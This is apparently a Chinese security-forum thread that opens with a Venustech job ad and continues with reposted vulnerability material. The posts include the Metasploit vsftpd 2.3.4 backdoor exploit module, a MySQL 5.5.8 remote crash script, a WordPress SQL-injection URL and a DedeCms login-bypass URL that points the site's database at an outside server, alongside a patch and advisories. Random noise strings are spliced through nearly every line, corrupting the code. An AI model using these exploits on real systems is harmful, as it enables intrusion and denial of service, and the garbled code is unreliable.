最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。8 m& b7 z  G) |) ^! w/ s0 c3 `, }/ j

    " \- Z3 A! \' [0 s# c5 b7 S! `

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.& k3 m" ]% }8 h" D; r  g6 Q' ~7 t  [3 d& j
    安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.$ ?* h; a9 s/ `- ~2 h$ _
    精通C语言编程

    2.( D$ W1 e. L9 V* h9 y% ~1 X+ ^4 `
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3.( L9 n3 C4 M( [! N8 P4 j
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.  V7 a* e  \; m
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.  g, A: G3 t. M$ Z* ]9 ?4 P: r0 X8 e( Y
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.6 o& G: U: c: p# D2 k. i
    负责产品的系统测试、集成测试工作

    2.
    ! j. r7 _( B) m) H, V% G负责产品用例的编写,执行、修改

    3.
      s4 L( D6 K+ R- `" v+ e! G7 \0 w' T负责产品性能的测试

    4.
    ( B9 |9 b% y+ W, a* A3 W4 w' ^负责对外项目的支持和测试工作

    岗位要求:

    1.+ v9 @2 Q" a9 @* E2 C
    掌握基本的tcp/ip知识

    2.
    1 Q  z  x6 F# J: a数通基础好

    3.
    : N2 g* ^. E, ~+ u- u, V# l对linux有一定的基础

    4.
    ; A9 ?! p. o2 U! Y5 k9 G3 R, ~# Y掌握数据库的搭建和使用

    5.
    . H( ?# S3 X: {$ V1 m4 ?6 z+ X6 n" {$ J至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    ( X. t' P) P+ S6 Q1 N- ]7 C熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    # ?. e5 q4 b4 a! N/ o8 X2 }9 u7 l熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    ( }7 I+ d5 w! A对网络安全设备在网络中的部署有一定的认识

    9.
    . H5 K" y4 Q; n; b# p' C5 V3 g掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    . @) ?7 y7 }2 }0 g; d9 F
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    5 Y, V, N, g6 q4 [$ k( x7 c
    对服务客户的技术支持

    3.  Q! P# ?! c9 E; T" f
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.5 x% n3 A' {2 l  H$ x- H- ~6 r
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    " n3 e' ?4 l7 {  Q
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################% x. j7 |# E- H/ ?# P1 t5 A

    ! j! d9 v" G8 ?( h! D/ m0 A' ^, A" Q5 m
    . R" W9 G: \% {( m1 ~
    require msf/core; c9 R9 s* U/ N

    8 D' {3 g- r0 N' @& ^6 c9 Q, {class Metasploit3 < Msf::Exploit::Remote
    3 p: c2 ^+ E$ c7 {& z0 ~4 D; m# oRank = ExcellentRanking$ N- A% s: Q. s. V9 {- f
    " C8 G* x5 @. r* Y1 v3 z% c' P/ ]& @
    include Msf::Exploit::Remote::Tcp: Q6 c0 _4 n/ q. u$ q

    & S6 \: b( b6 h- Q1 \def initialize(info = {})- j. ~% W; Y7 w8 W
    super(update_info(info
      Y! w7 Y) d  g7 N- u) L  \Name => VSFTPD v2.3.4 Backdoor Command Execution
    4 @; n# v( Y/ E6 fDescript_ion => %q{% ~& Y5 Z* X, d3 P
    This module exploits a malicious backdoor that was added to the VSFTPD download
    $ f: S, |* Z1 r6 J* K/ ^; d7 Darchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    ( v& I, B, b. F# n/ A2 CJune 30th 2011 and July 1st 2011 according to the most recent information
    . k5 D8 P1 S) r9 V( @  Tavailable. This backdoor was removed on July 3rd 2011./ `  ~; G& C( l3 F! T6 `. s4 K
    }
    1 ~0 J0 P+ K8 C& }$ p8 K! X! gAuthor => [ hdm mc ]
    . `  c3 n; z# c% dLicense => MSF_LICENSE
    ! o  l6 ]7 q# P: T( T& pVersion => $Revision: 13099 $& A, t: J. Q3 N0 D- X5 M
    References =>
    # y' x, G$ O9 y  T# B( v[$ Q- I8 `" V: S9 O& W
    [ URL http://pastebin.com/AetT9sS5]& _' |4 z, F( s( T& D+ Q+ e
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    # [$ `, O6 k& n2 Y4 n- E# c]
    # I0 x9 P! m; `Privileged => true4 @1 `/ Y, u7 E% l
    Platform => [ unix ]/ ]' k2 O4 ?0 u' Y$ A
    Arch => ARCH_CMD. Y8 ?9 ^+ u( g& T1 d8 b: \
    Payload =>0 \" P9 ?3 Q8 \- }
    {
    ' ^+ i  g! F$ A, W( _1 S& o/ MSpace => 2000
    5 j9 ^" {0 J& p% ?& w& j! j# A  wBadChars =>
    0 @3 a5 W5 R1 H, ?2 L- _5 ]DisableNops => true
    9 H  i# @7 y- u3 j; ]4 D+ I/ _1 wCompat =>4 U1 \! j" J  `" y
    {
    0 v$ w2 I- ]- k' }PayloadType => cmd_interact4 I0 g1 l* Z) \' N
    ConnectionType => find) k# c$ f. g0 W3 d( M
    }0 S/ L; W$ C: E  L6 `
    }
    % z0 E1 n# c  U6 J/ ETargets =>8 N2 W  `: t% X, `
    [( V) }. g+ ]  L8 W% t4 G0 F
    [ Automatic { } ]
    3 F7 N% Y- F( H8 H+ D]5 N! H$ U, V5 Z$ W
    DisclosureDate => Jul 3 2011
    # T* Q& ^/ b2 M! \( G4 dDefaultTarget => 0))
    4 u4 u- ?# |* Y# K" e+ K
    5 f7 u7 [3 c5 W& F& gregister_options([ Opt::RPORT(21) ] self.class)1 @' M) L1 y! w! B( d1 A
    end
    7 q0 h+ h8 ~( j( D5 t. }# y* k. S0 p, a9 p5 n! ^7 X+ q( G
    def exploit: F# m8 V; s2 s9 o2 z# @5 ~

    $ G7 p: d) Y( w' wnsock = self.connect(false {RPORT => 6200}) rescue nil
    " t) g- ?4 K. E% ~1 Eif nsock
    3 x  i3 |' ?: h, a1 `, v: Eprint_status(The port used by the backdoor bind listener is already open)
    . `& l( i# e" M( o6 Dhandle_backdoor(nsock)
    , m! r6 j2 u4 p9 greturn
    8 l( \* m* I1 \7 l" [end- T- a3 M5 @2 d4 o$ ?
    ' K) k9 D( ^5 _& o* E
    # Connect to the FTP service port first- u* g& z9 ]/ ~+ `9 [  A9 X  d
    connect9 Q2 L! k. _' G* F0 b  z

    3 s2 ~4 z1 w4 J: k6 Lbanner = sock.get_once(-1 30).to_s( I) \' @/ |. |* Y0 y+ j% X# ?
    print_status(Banner: #{banner.strip})
    7 G; h! @1 L& B" U0 a" {+ b: o' G. P  g/ m$ k# o5 [8 N; C2 E
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    , _0 V9 X+ n- K4 P9 c- |6 B)
    ' ~  s: z$ N: m" V% Zresp = sock.get_once(-1 30).to_s; n' S" k3 t7 r& q# e( ^; ~6 r1 E) O& Z
    print_status(USER: #{resp.strip})9 b& o6 @; N4 N+ d  K; C1 }

    - b7 x1 o/ Q& h/ O1 o( U5 Eif resp =~ /^530 /
    2 \, l7 w8 K/ C: x# }" N' ]; ]% v1 Lprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    & \3 e) p- |. N) M  kdisconnect
    6 `( n( a+ b  _* S+ S: h2 Rreturn
    5 Z: j) s* d% l7 rend9 ]- Y% t, A: b& J! m4 C- x
    ' p- U3 p/ R# u: @
    if resp !~ /^331 /
    4 [4 _  n* A+ `* T$ Vprint_error(This server did not respond as expected: #{resp.strip})
    * |( K8 y6 M% {0 I/ Jdisconnect
    ) z; w/ i6 w$ a  @return6 V' \' v( N0 C
    end+ T+ {5 r& j+ ]/ d! K, l: ]. p

    # @( R" T/ @' v  ^% x8 o3 g# Vsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
    4 ^( I' R9 e* j) S)# `% G  ~, q- K

    5 H1 m& }6 W3 t% r' v# Do not bother reading the response from password just try the backdoor
    - }% D, C+ r+ l) w" ], cnsock = self.connect(false {RPORT => 6200}) rescue nil" R! l3 Z: A5 ?3 t% d( f
    if nsock
    9 L, o! @  e9 k) o3 F3 Xprint_good(Backdoor service has been spawned handling...)
    4 v% X3 \' o# Z5 U" ehandle_backdoor(nsock)
    6 d/ v$ @) J* }# }0 s: d( y4 Freturn
    3 T3 d/ \5 U2 s/ ?& E- P* Send
    ) S! G8 u1 G# S. ]' C3 T& s0 b
    ( w. K: {4 n# i8 s" ~disconnect
    3 q4 [* y9 B, M, T5 k7 ~, b" N7 a" U* a' j$ b- E" ^
    end  V' \0 v  P6 ?9 J/ o0 Z
    4 Q# @, q8 _, ]+ r9 p7 x4 e6 \2 F
    def handle_backdoor(s)# `8 f& p- m$ k
    ) Y# J; U& G  y$ x' U) [
    s.put(id
    6 P; A$ q2 W6 o; x; D, i9 b)& `  @* I" J! a4 T- P/ s
    1 @% ]/ }/ @/ e4 e* ~$ ]: _; e
    r = s.get_once(-1 5).to_s
    7 i# |) D6 ~9 v$ T2 m3 Xif r !~ /uid=/
    3 S% }+ q# |; ^9 G% h4 yprint_error(The service on port 6200 does not appear to be a shell)* W' p3 M" e$ B9 m0 b
    disconnect(s)6 e# u6 _$ |5 W3 O0 ]; k$ `
    return+ Y- F5 I6 ^2 w. u: I8 E8 j
    end
    $ w& m, Z4 @# W" y' Q$ d, A4 P" j3 ]5 \5 L9 m1 F
    print_good(UID: #{r.strip})
    $ C) W& H3 W' \: T' Y+ p" {3 f/ ^  z9 S  n! l4 [; I6 k1 L
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    : D! q! `; L5 M3 \, x- khandler(s)
    ; s+ T8 ~( Q; P  R0 p) send
    # B- {+ T) `0 l
      e: _. r! }% _end复制代码0 f4 q  {, ~" |* K2 f" M

    $ z8 {% {. a3 V3 o1 S+ R9 S' f5 H, _) J" b% J
    % C1 z/ N* \6 }

    ' y7 h. Z7 s9 ?+ C* h1 a( b3 V. u! ]! F& S7 U+ d5 Y" r* B

    & |" h4 q0 P8 G
    ! q5 _5 \3 j! Q; Z" s" [7 F+ }! ^7 r  x+ u- x  i& Q9 P! D
    & g6 D( N9 s9 h1 m/ g
    - y* r7 a9 [  Z2 p# S& M  _' s

    + q% l7 n' E- m0 ^1 Q3 T. w8 I# @' _! n# s2 u8 Y
    / [2 M  G/ W0 J. r! n
    & g$ F9 A' {1 p4 u0 ]

    1 t1 f9 Q: k- P& ?3 _( k& R  N2 g3 g( b! Q0 G* Y

      ~2 S" s# _. b) [: r9 m/ ^) \5 C7 C+ E* ?+ }5 p0 x
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:1 C  x, j( A" t' Z0 S
      
    : `* J% \2 K+ v# w" W$ ~$ {/ U     ( f7 K' H# N% J- s* Q  K9 C
      + @8 D! T) t* [4 W9 w7 p: A: P
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    * ]0 Q- G' D8 A9 o# |1 L1 kallows an authenticated user to execute arbitrary SQL commands via the id
    - @+ W- O! j3 \7 gparameter to wp-admin/admin.php.   {; f) j% T; d# s' `
      
    7 G2 x( {$ g( K) l* X8 J5 W   . Z( S& L5 c8 p) @: v, b
      1 X% {! O; b( J& L1 [
    2. Proof of Concept:
    # m& ^7 b  X$ U+ w5 Y  0 b1 ]3 H' |/ q* Q% m9 F2 g4 Z
       , W: A) r7 F! n
      
      `- J; J, l( n$ }4 a2 Whttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id( x, h8 k& U! B5 U: n& P
    =1 AND SLEEP(10)8 F# ]# m1 E& V* S% R5 G

    4 j7 S. F* {( l1 u  & ^8 l# c4 l2 q0 Y% l+ t  \
       5 M# m+ g& n. e5 {2 l/ j2 c
      
    + x5 ?3 ^* c/ l3 B: I3. Solution:' d/ L; Z% k! d8 b) k+ H0 Y
      " W: D5 F# Z% O' }( ?/ N" D
         
    % t+ q: R8 |# Y+ d6 ?; k# O  
    ' q/ ~' S" m+ `9 sThe plugin has been removed from WordPress. Deactivate the plug-in and wait
    & }" n; h8 k" Efor a hotfix.! C' z5 r6 _* ~% {0 _3 \
      
    * O. t/ f# E- D   
    " n4 L8 {. ^- X+ L* x2 v1 m* h  
    . e0 I) i  B) @* X1 L4. Reference:4 \9 M# j6 T8 x- D, X( r
      
    4 R) Y6 @( |2 B; K) i( n   
    & D1 g. R8 p6 |5 g  P: N  6 x/ x; j/ I# c- j
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje6 X2 G8 M) e) a0 F( h$ D
    ction-sqli/* i5 U( w% m$ k# i
      ) u: x' m. P( n2 J; V) U
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    1 F! D# k* j" l! o8 r: i
    / B; |; U- q# @% @! r, l9 L1 U% @5 b6 j. O
    ! y( y4 S+ D0 x+ {- }9 e9 m
    / ^  w+ v) N+ C$ v* w: Y
    - V( c; z3 ~, Q
    5 S% S( _8 A" r$ I0 v
    ! Q) A; P' V9 l' `6 S- e1 p# l+ j

    + n: f6 c2 ?; x* x. M" _' _& q% ^4 c+ w& Z& I
    : @# M  I. S6 D+ v# [) V7 X/ y$ g

      s, ~! {- s3 F6 k) m$ M
    7 w$ q- P& t, P
    , V! E( O4 Q' s1 h. l. v$ t" x3 i" [% T! R' s$ M: A$ I( ~
    4 N3 w7 ]4 A, k' K- B, }

    ( K/ Y9 K& \9 r/ U8 s6 T7 F% I$ o" F- E' A+ {4 c4 j- I

    2 @1 b$ n! ]6 G公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    / P( g% ~& f& N; I( k) ~
    ' U+ T  p4 H! e( t$ F4 c& pprint "
    4 f3 g- O  z! W# n; ^7 o"; C, S( }: x2 z$ o
    print "----------------------------------------------------------------"5 a* Z5 W. r. K1 A: n( a4 V: K
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"/ i) s2 w2 i+ Y' w
    print "| Level Smash the Stack                                         |"& S0 }5 s$ S+ \7 Z! ^4 [
    print "----------------------------------------------------------------"# Z( Y# l7 E$ ]9 w5 p2 `$ U" w
    print "8 T7 L0 ^( l. L, i0 \4 d% H
    "8 d7 Z1 @$ s7 ]5 j' N4 `+ [- p
    % Q: }4 N8 A& F2 J, G  b
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"0 n% a' _( Y& Q7 s, O6 P, g
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")  }) w7 H! C$ L5 i

    & a0 b$ z4 G2 ?/ j7 b& `; vbuf2=("x11x00x00x00x03set autocommit30")
    2 f* d& f  ?3 n) M$ n/ L
    9 l; Z: l3 O" N( a% a7 @; x- y% qdef usage():
    ; i" A; A/ ^# {4 H5 ?! J! tprint "usage : ./mysql.py <victim_ip>"
    - _+ S/ s7 K! n+ jprint "example: ./mysql.py 192.168.1.22"
    , p! _. J6 o5 }. c/ v
    ; \' v2 \1 o$ q% i8 ^ / W) {. q+ f4 M0 v* r! j/ l
    def main():  Z" }1 M* p) C
    if len(sys.argv) != 2:. q* O# q$ Y; B, s6 V* V' d/ C) Q
    usage()
    / o6 g, r  S# }  t+ psys.exit()
    2 G1 H% D) g' ?9 A5 t$ `3 N% L- ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM): Z  b  ^/ W' T' z( x. e- A

    3 ^3 C- G2 O  g' |" `$ d$ WHOST = sys.argv[1]
    0 X0 _5 A3 h) k$ uPORT = int(3306); a5 J6 R6 s: m( z0 |1 {
    s.connect((HOST,PORT))
    0 y3 ]: B( u$ v3 L& r4 Q/ {, bprint "
  • Connect"
    + p: S( v  H+ D+ A- S" ^$ Zs.send(buf)# K% s2 M# U) B- y0 u
    print "
  • Payload 1 sent") U% G$ e3 H1 n8 w( {" }. Y4 Q; `
    s.send(buf2), O( s9 y) R2 [8 M9 j) w
    print "
  • Payload 2 sent! `4 l7 @5 }  }6 k& A
    ", "
  • Run again to ensure it is down.." m, e- H! }7 N- J
    "- b; b, [& w+ o- t$ @6 R. [5 s
    s.close(): _) x* _* W- F# H$ t" n* \

    % N& E: f/ A$ |  B( [if __name__ == "__main__":
    ) \" N1 |# a/ u7 u7 T8 A( hmain()- O* L& Z1 [7 k5 s$ y
      g: d$ {1 p8 G* A" ~  Z

    % W. `! a( [' L6 t
    6 O7 W! ^% r  r5 b- O7 c6 b& {; n: V/ M4 `9 ^/ \' t
    / [, S6 Q7 I+ s2 n) \& y

    ; c+ d  {, a# i7 f! |  q  [3 e* g
    . `7 Q9 f/ y* }7 y, {% ^0 Q7 h0 D3 Y0 Q
      t# Y; _# u( N" E2 `
    ' I7 o  I% j! v- I; z6 s' [

    6 D) }, E+ x4 S/ u* |: U% X- P
      f( S+ Z3 K2 z! w% }0 v
    , ]0 c. s5 d4 J+ t
    3 P/ D- T8 V; p% `3 \
    % Y" s4 _; ~2 t* R4 Y
    7 E8 t# s0 s; g8 j( X, m( I
    ( a4 T- n. f+ Z' A% x$ B, c* y) d/ n6 s0 N5 v& m: f
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    % h) o, u! N/ Q: ?$ H
    http://www.sitedir.com.cn/video/4.swf6 o( J9 K/ ]3 I

    ! C0 V: ?$ x/ n( m. T0 D$ N. N2 [5 I2 s2 x8 h# N

    , K2 A5 Z' ~& S: a% t/ ]
    1 ?# H  h, S! G0 ^7 d: ~. G' B6 J/ D6 M0 X6 c, w7 P$ u
    " m- q+ h) X; Y
    " H, s! t" C( d% i
    # S+ _( I: Z7 g# p

    # y5 @$ T! G$ P# Q
    8 w3 w# f% C9 J0 Z' K8 F9 m  _% V& Q

    - C) F  ^1 E$ \$ P7 u
    9 [( }$ o/ B( N; b* `* g& H( B! q: m( {

    ) B6 X7 ~" c# N$ \# V: }- N7 C3 e* ~$ I& _+ H
    % s; T  N7 R" V

    ) c# B# N& _! d: s1 g公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    . s' r/ R5 C  Q3 r+ G1 _8 f# ~) H' ^
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
      p4 t+ w5 W( w
    此漏洞的前提是必须得到后台路径才能实现

    ' j  `* p. W) a5 Y' n) j
    官方临时解决办法:

    " o1 d: l( o$ L/ C7 g
    找到include/common.inc.php文件,把:

    . J* B7 h0 w, b  `/ R
        foreach($_REQUEST as $_k=>$_v)
    : s' F: s/ f4 K% `    {5 `7 J+ S- L6 n4 x: N) p
            var_dump($_k);
    0 E- ^$ d9 C$ B: s0 U        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )+ y* H% `9 Z4 Z) k
            {
    " ^* b2 y5 g5 Z( _- E0 _            exit('Request var not allow!');
    ) V! m" {7 i1 e& `! J        }
    ! K6 y' s& K2 ]4 g" _    }
    9 c/ w3 v2 O) {7 P6 e/ e
    换成:

    # L- G  R: T' a$ [/ L3 D
        //检查和注册外部提交的变量. C2 k  o* l# p
        function CheckRequest(&amp;$val) {
    # g- s' w6 s  \* z. Y' `4 n6 I! D        if (is_array($val)) {  d; [3 c0 `1 V. L9 ^- @
                foreach ($val as $_k=>$_v) {7 B' @! z& G9 E! J% N4 Q* y
                    CheckRequest($_k);
    2 @# B7 k7 w5 I4 E, c                CheckRequest($val[$_k]);
    5 d# g* A3 s, @            }
    0 o* b0 i# X8 ~& W/ v        } else7 `# a1 N) Z0 t7 S! r
            {3 P7 @. D/ `1 C9 v8 \, y3 s4 Z
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    ; t% s: I0 K' x! l9 c5 s- e* D2 S            {$ ?7 B, |( U7 O* G, P9 i% @
                    exit('Request var not allow!');
      H# V% j7 G1 `# ^* s) L  _0 ?5 |$ m3 |            }
    4 c; H5 Y8 V6 O9 R+ J& r0 }- v        }! @+ ~. Z( T. ^# C5 r& |  g1 m$ R
        }
    % t: D3 ~- s7 L- B    CheckRequest($_REQUEST);
    6 p: _( o' [" p5 Q0 t7 a1 I; Q
    $ G, |" k# @9 t  T! Y$ q

    / W/ `0 L/ {$ z
    2 S+ Q' l& }" y3 R- R
    , X+ i) {+ U( N, l
    2 M* t0 C( t! l2 X8 U1 A: d% n1 ?
    ! M  h9 `, K( g% [2 G; s
    , f6 J( y1 V$ N4 E+ O! u9 g
    5 }. x' x! l' y0 K$ {$ o8 ~9 |

    5 ^9 |! O4 `9 e  `6 g3 }2 Z* H
    3 R& w# {. `# r% C- `  ^+ T/ d3 I! K

    * n/ U! V$ K% S4 h% x
    : P! S" w- k; [8 g9 S3 W9 W5 T, h) M: w6 w

    7 h8 c) W& p2 d- O7 C! Q; M: g) D+ R

    ( [* V' F+ X& r: _/ a" N$ i: X" @" Y+ c* z* E2 U
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>' B+ M  r( n, K- O

    - u$ J) m5 @: ], Phttp://www.sitedir.com.cn/video/8.swf[/quote]9 A6 n* m0 L: l1 w/ ~4 R  ^" K

    * ]: N- q6 H* E4 J* x' i; d( A0 p# c" {2 w" [

    ; v% J5 j3 O3 _( }1 n( x2 m9 U' G# }% \, {. Y

    / m* s: E! h* y7 z% ^7 u0 x  X% J2 L8 v; X1 d" u
    & `1 g& x8 l; n$ h8 Z

    - [& }  o. d0 K) S2 D8 ?6 i; N2 W. ~5 {2 a; {+ _- N

    6 L8 H1 m9 Q. K. b' N4 I: q9 ^# i. J; M1 t9 I7 e# f
    6 t- ^/ o% u7 `. V# L

    2 O3 H. d. }: U, b9 }+ C& S
    0 }8 i7 k4 y" o+ _4 u3 b/ X  J3 V! z0 H: T4 s: }" Z8 @
    0 n. X+ ?- H7 N# V- ?
    . p8 w8 u0 }* r2 w" a4 G
    ( J) O0 U+ g: J- s4 c) Z' V
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    : D3 ^/ \7 r- i2 i! M: \3 [
    影响版本:
    3 ~. r7 M, I, z) l' g) f- ZDjango 1.2.5
    - @8 H0 ?% d; O: ]& uDjango 1.3 beta 1
    ; y) @3 B% Y2 q& L: t2 ODjango 1.2.4: S$ E% h  J$ p& }. D* q
    Django 1.2.2
    - O$ ?7 u9 x# d* cDjango 1.2
    # `8 N$ R% L2 y. v* y
    漏洞描述:
    . _, }! F7 ~! k* h) y: m( p$ r" ]
    Django是一款开放源代码的Web应用框架,由Python写成。+ t' s- C. P6 B* O
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。8 P  @6 v4 p7 a, x5 j, H
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    ! s: W+ R+ j7 ~5 ?; n2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。8 ^/ k! q% z3 Y
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
      a1 C3 o: A% b9 ^+ N- B( A4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    / S7 C  T& d" ?! z5 P
    细节参考:
    2 b3 W0 ]* l. S. ehttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    # U0 O% @9 K) }: Zhttp://secunia.com/advisories/45939/
    9 z( E3 j$ O5 x$ c1 X4 h7 B: H9 T2 e& V# F
    : T& i) V3 S0 Y% D
    0 G- c, L  M" p$ t8 h" `- k
    * n) V. h) X8 }4 N: K
    ; q) O' M$ K; P& ?
    , J% ]' j/ {, |
    4 @; P# E* O: |

    * {1 h. s( j9 z' h' w
    - W6 o, ~9 q( S, z. G( E$ s
    9 M4 K$ B) J9 x, S) x7 g) t
    , f' b$ R9 E6 @" e7 E1 S
    ( Q5 X8 W- d; G' G8 i# J3 M8 z# @7 b: w3 }% v8 |
    2 G# h' ]) T  L, f& p. g% R, X
    & v0 C9 W( D2 ?; a/ D0 l" X3 r
    ' L) R5 F3 C# b2 C$ H/ Y, Q9 `
    6 u3 |' \7 ^5 V6 U
    ; H; B9 p! H1 |! o; V  r
    ) \3 Q) W7 O. f. Z, e

    / O2 K- T5 o! N3 j' b2 B6 x公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code; p8 }6 G4 u* _0 |  w# K
    影响版本: McAfee LinuxShield <= 1.5.1
    + V1 \4 ]) q# m* p8 q6 y1 N远程攻击: Yes 9 m# n, q6 X* _' p6 c! r
    本地溢出: Yes2 M1 ^+ z& C& @7 |) I. b
    背景阅读:
    ! ], `& A7 n/ @5 r/ X===========1 {$ l7 Y' K/ }% Y1 G4 {

    ' |# Z) _' I0 F! ULinuxShield detects and removes viruses and other potentially unwanted2 [+ Q) K2 ^. k7 t" ~( k
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    6 g& V/ \/ G) B9 s4 a% Dscanning engine ?&amp;#65533;&amp;#65533; the engine common to all our7 h6 [3 W/ z7 P7 c$ \# u7 @7 e% M4 X
    anti-virus products., Q! j8 j; w4 |6 D4 i, k
    $ ~( d( w; q& g  o) T9 N# r6 K
    Although a few years ago, the Linux operating system was considered a! z: N- F9 D2 ]5 j! K, a
    secure environment, it is now seeing more occurrences of software  ^0 f; R/ G4 C6 j
    specifically written to attack or exploit security weaknesses in
    ; h* b6 @$ d3 TLinux-based systems. Increasingly, Linux-based systems interact with
    , D$ |: ~$ D+ Q* L* {( ^) G+ o2 z- KWindows-based computers. Although viruses written to attack Windows-, t. }. a9 v. v4 u
    based systems do not directly attack Linux systems, a Linux server; N5 _8 u9 v! D8 Z3 D  i2 ~
    can harbor these viruses, ready to infect any client that connects to
    ) W2 N) |; S" y* Lit.
    ! @6 ~# K% X7 t  r6 r$ v, p
    # a! M3 ?( I  K2 zWhen installed on your Linux systems, LinuxShield provides protection
    + n) y0 I5 v% m6 m$ @  a$ |8 @against viruses, Trojan horses, and other types of potentially
    4 {8 @+ k) E0 wunwanted software.
    0 f" J& x" _( R2 P
    1 r+ t, @) c2 C) F- {* @LinuxShield scans files as they are opened and closed
    8 b, |( M% _: |$ a6 V?&amp;#65533;&amp;#65533; a technique
    5 I( N8 Y/ z; b0 Vknown as on-access scanning. LinuxShield also incorporates an  d4 t  `7 [; O' [  I" d! T
    on-demand scanner that enables you to scan any directory or file in
    & W& \4 d% q5 L$ C: |your host at any time.8 t# R/ ]! y- _

    ( D2 P  T! F' S2 g4 MWhen kept up-to-date with the latest virus-definition (DAT) files,
    . T+ Z$ J$ Y( A$ j$ lLinuxShield is an important part of your network security. We8 f- p. x9 d3 W: Z
    recommend that you set up an anti-virus security policy for your
    8 d/ w# b+ Q4 q8 y0 A9 I% rnetwork, incorporating as many protective measures as possible.
